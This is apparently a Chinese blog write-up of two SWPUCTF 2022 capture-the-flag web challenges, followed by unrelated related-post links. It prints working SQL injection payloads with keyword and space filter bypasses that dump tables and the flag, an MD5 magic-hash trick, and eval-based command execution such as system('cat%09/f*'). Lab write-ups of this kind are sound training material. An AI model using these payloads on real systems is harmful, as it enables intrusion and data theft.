NSSCTF做题(10)

叫10好听一点,就是补9的 第7页的内容

[SWPUCTF 2022 新生赛]ez_sql

get传参说是不安全,那就只能用post了

有回显了,两个假的flag

发现万能密码 1' or 1=1#变成了 1=1# 1=1# 1 1=1#=1# 1=1# 1=1#

发现or和空格都无了,union也过滤

空格可以用/**/来代替,union可以双写绕过

知道了大概的过滤,就直接开注

nss=2'/**/ununionion/**/select/**/1,2,3;#

成功绕过,回显位 2,3

查库:nss=2'/**/ununionion/**/select/**/1,database(),3;#

查表:nss=2'/**/ununionion/**/select/**/1,database(),group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db';#

查字段:nss=2'/**/ununionion/**/select/**/1,database(),group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb';#

查数据:nss=2'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_tb;# 得到flag

[SWPUCTF 2022 新生赛]webdog1__start

f12看源码 源代码里边的

复制代码
<!--
if (isset($_GET['web']))
{
    $first=$_GET['web'];
    if ($first==md5($first)) 
     
-->

传参,md5值相等,试着用数组绕过结果不行,那就用科学计数法

?web=0e215962017

还是查看源代码,得到robots.txt提示,访问得到一堆乱码,还有一个fl4g.php

不说了直接访问

源代码里也没什么东西,抓个包看看,发现有提示

访问一下F1l1l1l1l1lag.php,代码审计

  1. isset($_GET['get'])检查是否存在名为的GET参数。

  2. 如果参数存在,将其赋值给变量。

  3. strstr($get, " ")检查中是否包含空格。

  4. 如果中不包含空格,使用函数将中的所有"flag"替换为空格。这可能是为了防止对flag进行直接访问。

  5. 如果的长度大于18个字符,输出"This is too long."并终止脚本的执行。

  6. 如果的长度小于等于18个字符,使用函数执行中的内容。函数可以执行字符串形式的PHP代码。

  7. 如果中包含空格,输出"nonono"并终止脚本的执行

可以看到有eval函数,命令执行没得跑了 输入命令?get=system('ls');

看到了flag.php 尝试访问,绕过空格的方法,绕过flag就可以用通配符/f*来绕过

得到flag ?get=system('cat%09/f*');

相关推荐
twj_one3 小时前
Arthas使用
java
lizz313 小时前
C++模板编程:从入门到精通
java·开发语言·c++
shoubepatien4 小时前
JAVA -- 05
java·开发语言
寰天柚子4 小时前
Java并发编程中的线程安全问题与解决方案全解析
java·开发语言·python
沐知全栈开发4 小时前
Bootstrap 下拉菜单:设计与实现指南
开发语言
memgLIFE4 小时前
Springboot 分层结构
java·spring boot·spring
shoubepatien4 小时前
JAVA -- 08
java·后端·intellij-idea
kong79069284 小时前
Java新特性-(二)Java基础语法
java·新特性·java 基础语法
yangminlei4 小时前
springboot pom.xml配置文件详细解析
java·spring boot·后端
Evand J4 小时前
【MATLAB例程】多锚点RSSI定位和基站选择方法,基于GDOP、基站距离等因素。以Wi-Fi定位为例,附下载链接
开发语言·matlab·定位·gdop·rssi